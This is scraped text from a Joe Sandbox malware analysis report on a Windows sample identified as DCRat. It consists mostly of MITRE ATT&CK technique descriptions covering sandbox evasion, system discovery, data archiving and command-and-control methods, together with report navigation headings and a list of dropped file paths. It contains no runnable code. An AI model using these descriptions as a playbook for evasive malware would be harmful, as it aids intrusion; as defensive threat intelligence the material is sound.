Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report wmdqEYgW2i.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: DCRat

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ComponentReviewperfmonitor\24dbde2999530e

C:\ComponentReviewperfmonitor\4e2afe13b84ff4

C:\ComponentReviewperfmonitor\659c2d566c795c

C:\ComponentReviewperfmonitor\Mscrt.exe

C:\ComponentReviewperfmonitor\QUMJYJlT6Ngt.bat

C:\ComponentReviewperfmonitor\Uq2tX7p25HNYhIggX0PpAZXDUcRcexvQlwrHhzLqWtjOjit.vbe

C:\ComponentReviewperfmonitor\WmiPrvSE.exe

C:\ComponentReviewperfmonitor\tQRjIvxcBsFMaEOtv.exe

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Bootstrapper.exe_2089d253ff582166559cfbd4beb56f55b82b71_302a1b6e_c587e25d-a4ad-4da5-bbb4-220a15b06fda\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WERC9EE.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WERCC60.tmp.WERInternalMetadata.xml

Windows Analysis Report
wmdqEYgW2i.exe

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre